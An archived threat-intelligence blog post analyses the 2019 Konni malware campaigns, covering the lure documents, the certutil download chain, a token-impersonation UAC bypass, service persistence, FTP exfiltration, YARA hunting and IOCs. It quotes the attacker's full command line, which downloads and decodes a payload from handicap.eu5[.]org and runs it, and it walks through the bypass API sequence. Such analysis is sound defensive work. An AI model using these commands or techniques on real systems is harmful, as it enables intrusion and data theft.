A Look Into Konni 2019 Campaign
By Doron Karmi
Published: 2020-01-08 · Archived: 2026-04-29 07:00:53 UTC
11 min read
Jan 4, 2020
Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is
potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims
are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania,
Kuwait, and other parts of the Middle East.
Press enter or click to view image in full size
Map chart of APT37 main targets
The latest activities leveraging the Konni malware family potentially target political organizations and politically
motivated victims in Russia and South-Korea. During my research, I observed 3 distinct campaigns throughout
2019: starting from January to late September.
Konni Infection chain consists of multiple stages and utilizes living-off-the-land binaries in its operation from the
use of certutil.exe to download additional files and decode their content to sc.exe and reg.exe for persistence.
These campaigns leverage similar C2 infrastructure for the delivery and a specific free FTP service used for
exfiltration the stolen data from the affected targets. Additionally, the macro-armed lure documents used to deliver
and install the Konni payloads have similarities across all 3 campaigns.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 1 of 24

Konni is a modular malware that collects reconnaissance data on the target machine prior to sending further
modules to the victim. We were unable to find additional operations related to the Konni malware family that
might reveals further capabilities and malware types used by the group associated with Konni activity.
During our analysis I found overlapping between the Konni infection chain, tools and technique used by the
Syscon backdoor [1] using a service called COMSysApp to load the payload as a service DLL as a mean to
achieve persistence on the victim machine. Although similarities have been observed between Konni and Syscon,
at this time we can’t say with full certainty that the same threat actor is behind both operations.
Campaign Timeline
Press enter or click to view image in full size
Execution flow
Press enter or click to view image in full size
Typical Konni Execution Flow
Konni Multi-Stage Operation
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 2 of 24

Stage 1 — Initial Execution
In mid-July 2019 I encountered with an emerging campaign delivering the Konni malware.
The threat actor behind the campaign leveraged a malicious macro-armed Microsoft Word document titled: “О
ситуации на Корейском полуострове и перспективах диалога между США и КНДР” (translated to: About the
situation on the Korean Peninsula and the prospect of a dialogue between the United States and the DPRK).
Unlike the previously observed campaign, the August campaign potentially targeting Russian language speakers
with an interest in Korean Geo-political situation, the lure document used in this campaign is written Cyrillic and
contains content related to North Korean American foreign affairs.
Press enter or click to view image in full size
Decoy document for 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726
When analyzing the document, we see that the internal codepage of the lure document is 949 — ANSI/OEM
Korean (Unified Hangul Code). indicating that the actor who created the document used Korean keyboard layout.
This is an indication that the author is a Korean native speaker.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 3 of 24

Document Properties. Codepage 949 is windows Korean (Unified Hangul Code)
The lure document contains VBA macro code with the following capabilities:
Changes the font color from light grey to black — to trick the victim to enable content.
Checks if windows is a 32 or 64 bit version.
Constructs and executes the command-line to download additional files
Press enter or click to view image in full size
Macro code for 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726
The document contains 3 hidden text boxes. Each text box has a hexadecimal string constructed to a command
that is executed once the document is opened by the victim.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 4 of 24

Press enter or click to view image in full size
Full Command Line example: c:\windows\system32\cmd.exe /q /c copy /y %windir%\system32\certutil.exe
%temp%\mx.exe && cd /d %temp% && mx -urlcache -split -f http://handicap[.]eu5.org/1.txt && mx -decode -f
1.txt 1.bat && del /f /q 1.txt && 1.bat
Certutil is a living-off the land command line utility that can be used to obtain certificate authority information
and configure certificate services. Threat actors usually utilize certutil to download remote files from a given
URL. It also incorporates a built-in function to decode base64-encoded files.
CMD silently copies certutil.exe into temp directory and rename it to “mx.exe” in an attempt to evade detection
and then downloads 1.txt from from a remote resource: http://handicap.eu5[.]org. The text file contains a base64
encoded string that is decoded by certutil and saved as 1.bat.
The threat actor removes tracks by silently deleting 1.txt from the temp directory and then executes 1.bat.
Press enter or click to view image in full size
Konni Initial Execution
Stage 2 — Privilege Escalation
The batch script acts as a second stage downloader and downloads two additional files, depending on the system
architecture. Certutil is executed to download a txt file and decode its content. Decoding each base64 string (32-
bit or 64-bit version) results in a cabinet file — setup.cab
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 5 of 24

1.bat: downloads next stager
The content of the cabinet file is then extracted into %temp% folder, and setup.cab file is deleted from the system.
setup.cab files
Install.bat — acts as installer to ensure persistence and execute mshlpsrvc.dll.
mshlpweb.dll — acts as loader; responsible to elevate privileges.
mshlpsrvc.dll — final payload; responsible for data exfiltration.
mshlpsrvc.ini — configuration file; contains URL used by mshlpsrvc.dll
Both dropped DLL files are unsigned and packed with UPX packer.
Press enter or click to view image in full size
DLL file is unsigned & UPX strings indicate file is packed
To check level of permissions, the threat actor uses net.exe. if the current user has high privileges, install.bat is
executed directly. Otherwise, mshlpweb.dll is executed using rundll32.exe.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 6 of 24

1.bat: Checks for user’s permission
mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute
install.bat with high privileges. To gain higher privileges mshlpweb.dll execute the Windows Update Standalone
Installer, wusa.exe. This process runs as a high-integrity process by default, since its set to auto-elevate within its
manifest.
Press enter or click to view image in full size
wusa.exe manifest, autoElevate set to true
mshlpweb.dll contains an access token impersonation routine that duplicates the token of the high integrity
instance of wusa.exe, and uses it to create a new cmd.exe process running under the security context of the
impersonated user[2], which in turn execute the installer — install.bat.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 7 of 24

Press enter or click to view image in full size
wusa.exe runs with high integrity
Token Impersonation Routine
mshlpweb.dll utilize a set of standard windows API calls to duplicate the token of wusa.exe and use it to spawn
high integrity instance of cmd.exe. Higher privileges are needed to execute the installer, install.bat. The technique
used by the threat actor is a full fileless UAC bypass named “Cavalry” that was leaked back in March 2017 to
WikiLeaks as part of “Vault 7”, a series of leaks on the US CIA that included sophisticated privilege escalation
techniques used by several actors in the wild since the leakage [3]. This technique also bypasses UAC with the
“AlwaysNotify” settings.
Technique flow:
wusa.exe is executed in hidden window using ShellExecuteExW;
Handle to the access token associated with wusa.exe is created.
The token object of wusa.exe is duplicated using DuplicateTokenEx. The threat actor pass
“Token_all_access” as desired access, which combines all possible access rights for a token and creates a
new impersonation token.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 8 of 24

New SID with medium privileges is created and set with NtSetInformationToken to the new duplicated
token to lower its mandatory integrity level.
Restricted token is then created and duplicated using NtFilterToken and DuplicateTokenEx respectively.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 9 of 24

The new duplicated token is passed to ImpersonateLoggedOnUser.
An elevated cmd instance is spawned using CreateProcessWithLogonW function. The credentials passed as
arguments to the function (Username: aaa, Domain: bbb, Password: ccc) are identical to the credentials
specified in the UAC bypass implementation by FuzzySecurity, UAC-TokenMagic [4]
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 10 of 24

I used the James Forshaw’s excellent blog [6] explaining in detail how to bypass UAC using the technique above.
Press enter or click to view image in full size
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 11 of 24

Konni 2nd stage and privilege escalation flow
Stage 3 — Persistence
When the installer is executed, it first stops COMSysApp, a service that manages the configuration and tracking of
Component Object Model (COM)-based components, using sc.exe utility.
COMSysApp service is first configured to autostart and the binpath of the service is set to svchost.exe.
COMSysApp service is added under the “SvcHost” key as a preliminary step to its execution in the context
of svchost.exe.
The malicious DLL is added as a service DLL of COMSysApp.
COMSysApp service is restarted.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 12 of 24

Install.bat: Persistence & Execution of mshlpsrvc.dll
Once COMSysApp service is restarted the malware is loaded in memory, and the batch file is removed from the
infected system. The final payload (mshlpsrvc.dll), and its configuration file (mshlpsrvc.ini) are both copied into
the system32 directory from the temp directory and then deleted.
Install.bat: files copied to System32 directory
mshlpsrvc.dll Execution and Persistence flow
Stage 4 — Data Reconnaissance and Exfiltration
After ComSysApp service is restarted, a new instance of svchost.exe is spawned and loads the final payload
mshlpsrvc.dll. mshlpsrvc.ini is a configuration file that was delivered together with mshlpsrv.dll in earlier stage of
the attack. This file contains a Base64-encoded string with a custom key, the file is read and decoded by
mshlpsrvc.dll to perform an outbound connection and download handicap[.]eu5[.]org/4.txt.
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 13 of 24

Press enter or click to view image in full size
The Custom Base64 key used to decode mshlpsrvc.ini content
Data Reconnaissance
Prior to execution of any recon command to gather information from the target machine, the default codepage of
the console is changed to “65001” (utf-8)
cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f
Get Doron Karmi’s stories in your inbox
Join Medium for free to get updates from this writer.
Remember me for faster sign in
The following information is gathered from the affected machine and sent back to the control server:
System info using: cmd /c systeminfo >%temp%\temp.ini
List of running process using: cmd /c tasklist >%temp%\temp.ini
The temp.ini file is then compressed into a cabinet file and saved to C:\Windows\TEMP: cmd /c makecab
“C:\Windows\TEMP\temp.ini” “C:\Windows\TEMP\temp.cab”
The downloaded file, 4.txt, contains a base64 encoded string with the same custom key as used before. Following
decoding, the file content appears to be the FTP credentials for the FTP service that acts as the command &
control server for this attack. We’ve observed similar past campaigns where free FTP services were used as the C2
for other Konni and Syscon variants, staring from October 2017. [5]
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 14 of 24

FTP credentials for C2 server
Exfiltration
The data is exfiltrated in the following way:
The temp.cab is base64 encoded with the same custom key used earlier.
Encoded temp.cab is copied to a post.txt under the directory C:\Windows\TEMP.
files uploaded to the control server using “stor” command.
Press enter or click to view image in full size
FTP Session — login to the C2 FTP server and data exfiltration
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 15 of 24

Data Reconnaissance and Exfiltration flow
2019 Outbursts — Konni Campaigns
During my research, I have observed 3 additional outbursts on 2019: 2 similar samples observed on January 2019,
and another one on September 2019.
Press enter or click to view image in full size
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 16 of 24

2019 Konni Outbursts
Monitoring the Konni family samples, and the techniques used in the various campaigns throughout the year
allowed me to track the malware evolution and changes made by the APT, but also to find many similarities
incorporated in every Konni campaign.
Hash Comparison
Imphash (for “import hash”) is a unique hash value assign to PE files based on the import table of the file. The
hash is calculated by the library and API function names and their order within the executable. This is an efficient
way of pivoting on malicious executable files that share a similar payload are most likely created by the same
group.
Press enter or click to view image in full size
The compiler’s linker builds the Import Address Table (IAT) based on the specific order of functions within the
source file, same Imphash value indicates that the PE IAT table includes the same functions and in the same order.
This is a strong evidence that ties together different payloads from different campaigns to the same threat actor.
Doc Properties Comparison
All lure documents associated with Konni activities are written in Cyrillic, and potentially target political
organizations and politically motivated victims in Russia. Notwithstanding, we found that all 3 documents files’
internal codepage is set to 949 — ANSI/OEM Korean (Unified Hangul Code).
Press enter or click to view image in full size
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 17 of 24

Macro Comparison
The lure document is armed with a VBA macro that essentially comprise the command line to be executed. The
final command line that is composed by the macro is identical across all 3 campaigns expect of the C2 URL,
where the next stager is downloaded from. In our example from the July campaign the final command line is:
c:\windows\system32\cmd.exe /q /c copy /y %windir%\system32\certutil.exe %temp%\mx.exe && cd /d %temp%
&& mx -urlcache -split -f http://handicap.eu5[.]org/1.txt && mx -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat
Below you can see the evolution and changes made in the macro code level throughout the Konni attacks; one
notable change is the switch to hidden text boxes within the document that contain the hex representation of the
commands instead using it directly in the macro.
Press enter or click to view image in full size
Decoding Routine
Konni malware family use a custom base64 key to encode the content of several files in the exfiltration phase. We
observed the same flow of data reconnaissance and exfiltration across all campaigns:
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 18 of 24

Typical Konni Data Reconnaissance and Exfiltration
Also, the decoding routine is identical across all Konni samples we have analyzed which indicate a code reuse by
the threat actor.
Press enter or click to view image in full size
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 19 of 24

Konni Decoding Routine
Hunting for Konni
The YARA rules below were used to find additional samples of the Konni malware known in the wild. It is a
combination of unique strings of the macro within the lure documents, unique strings and win API calls from the
payload and unique opcode sequence taken from the decoding routine shared among all samples.
Press enter or click to view image in full size
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 20 of 24

YARA Rule: Lure Doc
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 21 of 24

YARA Rule: Konni Payload
Check my YARA github page to test out the YARA rules I used to hunt for Konni samples.
MITRE ATT&CK Techniques
Execution
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 22 of 24

T1059-Command-Line Interface
T1129-Execution through Module Load
T1085-Rundll32
Persistence
T1031-Modify Existing Service
T1050-New Service
Privilege Escalation
T1134-Access Token Manipulation
T1050-New Service
Defense Evasion
T1134-Access Token Manipulation
T1088-Bypass User Account Control
T1140-Deobfuscate/Decode Files or Information
T1112-Modify Registry
T1085-Rundll32
Discovery
T1057-Process Discovery
T1082-System Information Discovery
Exfiltration
T1048-Exfiltration Over Alternative Protocol
T1132-Data Encoding
IOCs
Lure Documents
8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd
4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726
ed63e84985e1af9c4764e6b6ca513ec1c16840fb2534b86f95e31801468be67a
Konni Loader
6a22db7df237c085855deb48686217173dc2664f4b927ebe238d4442b68a2fd3
2ab1b28bae24217e8b6dd0cd30bb7258fa34c0d7337ecfea55e4310d08aeb1e6
Konni final payload
e94fa697d8661d79260edf17c0a519fae4b2a64037aa79b29d6631205995fdad
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 23 of 24

6256ba2b89c78877328cc70d45db980310a51545a83d1d922d64048b57d6c057
52ba17b90244a46e0ef2a653452b26bcb94f0a03b999c343301fef4e3c1ec5d2
7d2b1af486610a45f78a573af9a9ad00414680ff8e958cfb5437a1b140acb60c
ceb8093507911939a17c6c7b39475f5d4db70a9ed3b85ef34ff5e6372b20a73e
8795b2756efa32d5101a8d38ea27fca9c8c7ed1d54da98f0520f72706d1c5105
7f6984fa9d0bbc1bd6ab531f0a8c2f4beb15de30f2b20054d3980395d77665af
290c942da70c68d28a387775fbb7e6cab6749547d278cb755b4999e0fe61a09f
274e706809a1c0363f78363d0c6a7d256be5be11039de14f617265e01d550a98
IP Addresses
69.197.143.12
185.27.134.11
88.99.13.69
162.253.155.226
Domains
clean.1apps[.]com
handicap. eu5[.]org
panda2019.eu5[.]org
ftpupload[.]net
Source: https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Page 24 of 24